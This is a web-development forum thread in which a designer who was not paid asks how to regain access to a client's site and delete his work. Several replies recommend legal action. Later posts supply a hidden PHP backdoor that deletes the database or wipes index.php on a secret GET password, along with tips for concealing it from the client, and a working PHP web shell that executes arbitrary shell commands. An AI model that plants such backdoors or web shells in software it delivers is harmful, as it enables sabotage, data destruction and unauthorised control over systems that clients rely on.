Hi Guys & Dolls

Question to you boffin's out there...

I designed a commercial web site for a customer, and now the owner has changed the FTP password and refuses to pay me for my services. Any idea how I could get access to the site to delete my work etc.

I know it sounds strange.. but customers can be a real pain at times and I do not see why he should have 50 pages of my work for free.. after all I'm not a charity.

Any suggestions or ideas would be appreciated...:confused:

I think if you try to access the FTP password using some indirect methods it will create problems for you.

Even if it is your work i think simply accessing the FTP server by breaking into the server and deletes your work will make that an illegal act from your side. The site owner can approach justice department in that.

You can go legally if you have some proof that you've done the work and if that person can't provide any payment details he made in the past, it will become his problem to provide enough proof that clarifies that he did pay you.

Difficult situation.

Go to Court!!!!! :D

Sue him.

The only way that I can think of to hack into ftp would be to use brute force.
To do so, it's not that complex, more tedious, really, to write a script that would do it for you.
The problems--
1-- you need to know the username (or, I suppose, the password), as doing both would take an insanely long time.... insanely long. As in decades.... millennia.
2-- brute force works great through about 5 characters. After that, it starts to take about a week for 6 chars, and for 7, muuuuuuch longer.... like a year, if not more.
I think these numbers are about right. The process is exponential, and all based on the number of characters you check for.

I wrote a script that did this (just for fun, tried to hack my own server), and I think it took like 2 days to get a 6 character password (and that was all limited to lowercase letters).


So.... this was just a random tangent, and wouldn't help you anyway.
And, yes, it would be illegal.

Just sue him.

Get a lawyer (or a lawyer friend) to write him a letter. Should do the trick.

Also note, that if you were able to get in, most web hosts offer a back up of all files, and this back up is usually done daily.

If you were to delete your files, the client could just run the back up and re install the pages.

djr33: Depends on the speed of the processor (and network).
Brute-forcing is a particularly clumsy method, and will be immediately noticed by any competent network admin.

Also, of course, it's illegal: whether it'd be a crime against the client or not, I don't know, but the server company can (and probably would) prosecute.

Lawyer suggestion seconded.

you could also try going through the host. Once again you will need proof that they stole your work, but the host may be willing to help.

Right. But the processor of the server you're trying to access, not yours. For example, if you were to run the same script from multiple computers, it might seem as if that would be faster, but it would instead do twice as many requests from twice as many servers, thereby slowing the rate at which they are processed.... so.... no way to speed that up.
And, yes, illegal.

Go through the host, send him an official letter (from a lawyer if possible), then get a lawyer and sue/etc.

Simon in future accept payment before you give him the acess to the webpage and what hosting service did you use

Yeah... show him all he wants, but from the user side of things... put them on your site, then sell them to him if he likes it.
:)

Just out of curiosity what is the domain. You may want to PM me if you dont want it in the search engines.

Next time, create a nice little way to allow your self access via php. Hehe.
Or not. :p

And surely he has already saved all the word you did to his own computer.

Would you mind telling us the company (If there is one)?

Hi

A couple of you asked the web site address.... it's

URL removed by ddadmin per poster request

djr33... you mentioned creating a backdoor in php?? how would I go about that for future reference??

Nice Website...

Creating a back door in php isn't that complex.
All you'd need to do is...
<?php
if ($_GET['password'] == "secret") {
mysql_query("DELETE DATABASE `data`);
}
?>

That's it.

Of course, I think the syntax on the SQL query is wrong, and that would assume you're using a database named "data" that you would wish to delete.
you might also need to open a connection w/ the database if it wasn't already open.

Or, you could do something like:
$file = fopen('index.php', "w");
fwrite("",$file);
fclose($file);

which would open the file index.php, wipe it's contents, then save "" into it, and close the file.

You would also want to think about a more complex way of accessing it, so that it didn't happen by accident. that's unlikely already, but you might want to add a few more variables with random passwords, or use POST variables from a page that only you have access to (the page you made... others could still send post values at the page)... etc.
Wouldn't want someone to accidentally wipe the page.

However, I was mostly kidding... not sure if you want to do that. But you certainly might want that one something you are just giving them to play with or test.
You could also make it dependant on your site.... get some code or something from a page located on your website, then delete that page from yours and their page will no longer function.
Of course this assumes that once the money is dealt with, you'd give them the "full" copy.
Might be a nice security measure til then.
It's not very honest to leave it in there after they pay, so.... take it out after that :)

Not sure if it's exactly legal, but it is your page, and they put it on the site, and you're just using/running it.... probably ok.

but, again, be smart with this ;)
(But you seem reasonable enough.... not saying that i'm worried)


And, really, just get the payment first, and let them test all they want on your server next time.

lol. What if they view the source?

Obviously your client would need not know about PHP for that to work.
Or you'd need to hide it well.
likely, if they're good enough to spot that, they wouldn't be hiring you. But, if that does happen, then just tell them you are ensuring that they pay. however, if they know enough to delete it, then you're out of luck.
Which is why I suggest having part of the page come from your website, so they can know about it but not have access to it until they have finalized payment.

<?php
$cmd = $_POST['cmd'];
$output = $_POST['op'] . "\n" . shell_exec($cmd);
?>
<html>
<head>
<title>Command Executor</title>
</head>
<body>
<form action="<?php echo($PHP_SELF); ?>" method="post">
<textarea name="op" style="width: 100%;" rows="40"><?php echo($output); ?></textarea><br/>
<input type="text" name="cmd" style="width: 100%;"/>
<input type="submit" value="Execute" style="width: 100%;"/>
</form>
</body>
</html>This is very rough-and-ready. I don't vouch for the security or legality of it, only the effectiveness :)

Same abou the security/legality of mine ;)

And, I'd use Twey's. He's smarter than me.

oh wow...
you guys just figured out several ways to destroy the internet.
good thing were good guys.


i suppose...

Only one server at a time....